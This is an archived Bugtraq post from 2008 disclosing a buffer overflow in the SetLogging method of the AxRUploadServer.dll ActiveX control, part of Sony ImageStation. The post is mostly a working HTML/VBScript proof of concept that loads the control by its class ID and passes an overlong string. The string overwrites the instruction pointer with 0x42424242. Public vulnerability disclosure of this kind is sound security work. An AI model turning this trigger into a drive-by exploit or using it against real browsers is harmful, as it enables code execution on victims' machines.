Bugtraq: Buffer Overflow Vulnerability in AxRUploadServer.dll, Activex Method (SetLogging)

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Bugtraq mailing list archives

Buffer Overflow Vulnerability in AxRUploadServer.dll, Activex Method (SetLogging)

From: david130490 () hotmail com
Date: 8 Feb 2008 16:53:59 -0000

Buffer Overflow in AxRUploadServer.dll, this file belongs to ImageStation that is a servicemark of Sony Electronics Inc.

--------------
Access Violation at 0x42424242

The code:

<object classid='clsid:E9A7F56F-C40F-4928-8C6F-7A72F2A25222' id='bof'></object>
<input language=VBScript onclick=Son() type=button value="Explotar">

<script language='vbscript'>
 Sub Son
        arg1=String(5922, "A")
        arg2=String(5, "B")

        bof.SetLogging arg1 + arg2
 End Sub
</script>

By Date By Thread

Current thread:

Buffer Overflow Vulnerability in AxRUploadServer.dll, Activex Method (SetLogging) david130490 (Feb 08)
- <Possible follow-ups>
- Re: Buffer Overflow Vulnerability in AxRUploadServer.dll, Activex Method (SetLogging) david130490 (Feb 08)